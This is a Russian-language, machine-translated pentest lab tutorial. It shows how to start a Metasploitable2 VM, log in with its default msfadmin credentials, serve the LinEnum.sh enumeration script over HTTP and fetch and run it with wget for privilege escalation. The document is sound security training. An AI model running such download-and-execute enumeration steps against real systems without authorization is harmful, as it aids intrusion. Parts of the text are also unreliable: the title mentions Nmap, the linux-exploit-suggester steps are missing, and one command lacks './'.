Изучение инструментов повышения привилегий Linux в Nmap

Beginner

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом лабораторном занятии мы рассмотрим два наиболее часто используемых инструмента автоматизации повышения привилегий в Linux - LinEnum и linux-exploit-suggester. Цель состоит в том, чтобы научиться эффективно использовать эти инструменты для ускорения процесса повышения привилегий во время пентеста или безопасности оценки. Освоение этих инструментов может значительно сэкономить время и усилия, позволив вам сосредоточиться на понимании основополагающих принципов и методологий повышения привилегий.


Skills Graph

Настройка среды

На этом шаге мы настроим виртуальную машину Metasploitable2, которая будет служить нашей целевой системой. Следуйте инструкциям ниже, чтобы запустить виртуальную машину и установить соединение:

В нашей лабораторной среде настройка виртуальной машины Metasploitable2 была предварительно настроена. Вы можете запустить виртуальную машину и подключиться к ней с помощью следующих шагов:

  1. Откройте терминал и выполните следующую команду, чтобы запустить виртуальную машину Metasploitable2:

    sudo virsh start Metasploitable2
  2. Подождите 1 - 2 минуты, пока виртуальная машина полностью загрузится и будет готова к использованию.

  3. Убедитесь, что вы можете отправить ping - запрос на IP - адрес Metasploitable2 (192.168.122.102) с вашего хост - компьютера.

  4. Используйте следующую команду, чтобы подключиться к виртуальной машине Metasploitable2 по SSH:

    ssh msfadmin@192.168.122.102

    При первом подключении вас попросят подтвердить подлинность хоста. Введите yes и нажмите Enter, чтобы продолжить.

    Затем введите пароль msfadmin, когда вас об этом попросят:

    msfadmin

После успешной аутентификации у вас должна быть сессия оболочки с низкими привилегиями на виртуальной машине Metasploitable2.

LinEnum: автоматизация перечисления системы Linux

LinEnum - это мощный скрипт, который автоматизирует процесс перечисления на системе Linux, собирая ценную информацию, которая может помочь в процессе повышения привилегий. Следуйте шагам ниже, чтобы использовать LinEnum на виртуальной машине Metasploitable2:

  1. На вашем хост - компьютере откройте терминал и перейдите в каталог /tmp:

    cd /tmp

    В каталоге /tmp проекта есть скрипт с именем LinEnum.sh.

  2. Запустите HTTP - сервер Python в каталоге /tmp, чтобы разместить скрипт LinEnum:

    python3 -m http.server 8000
  3. На виртуальной машине Metasploitable2 перейдите в каталог /tmp и загрузите скрипт LinEnum с помощью wget с HTTP - сервера Python, запущенного на вашем хост - компьютере:

    Перейдите в каталог /tmp:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp
  4. Сделайте скрипт LinEnum исполняемым:

    chmod +x LinEnum.sh
  5. Выполните скрипт LinEnum и перенаправьте вывод в файл для дальнейшего анализа:

    LinEnum.sh > linenum_output.txt

LinEnum выполнит различные проверки и перечислит системную информацию, выделяя потенциальные уязвимости или неправильные настройки желтым текстом. Уделите особое внимание этим выделенным областям, так как они могут раскрыть возможности для повышения привилегий.

Резюме

В этом лабораторном занятии мы научились использовать два мощных инструмента автоматизации, LinEnum и linux-exploit-suggester, для помощи в процессе повышения привилегий на системах Linux. LinEnum предоставляет комплексное перечисление системной информации, выделяя потенциальные уязвимости и неправильные настройки. Инструмент linux-exploit-suggester анализирует версию ядра и предлагает соответствующие эксплойты для ядра, которые могут привести к повышению привилегий.

Используя эти инструменты, мы можем упростить фазы сбора и анализа информации, экономя ценное время во время пентеста или безопасности оценки. Однако важно понимать, что эти инструменты предназначены для помощи в процессе, и твердое понимание техник и методологий повышения привилегий по-прежнему необходимо для успешного эксплойта.

В рамках этого лабораторного занятия мы практиковались в настройке уязвимой виртуальной среды, загрузке и выполнении скриптов LinEnum и linux-exploit-suggester, а также интерпретации их вывода. Практический опыт, полученный в этом лабораторном занятии, будет неоценимым в реальных сценариях, где эффективное и результативное повышение привилегий является критическим навыком для этических хакеров и профессионалов в области безопасности.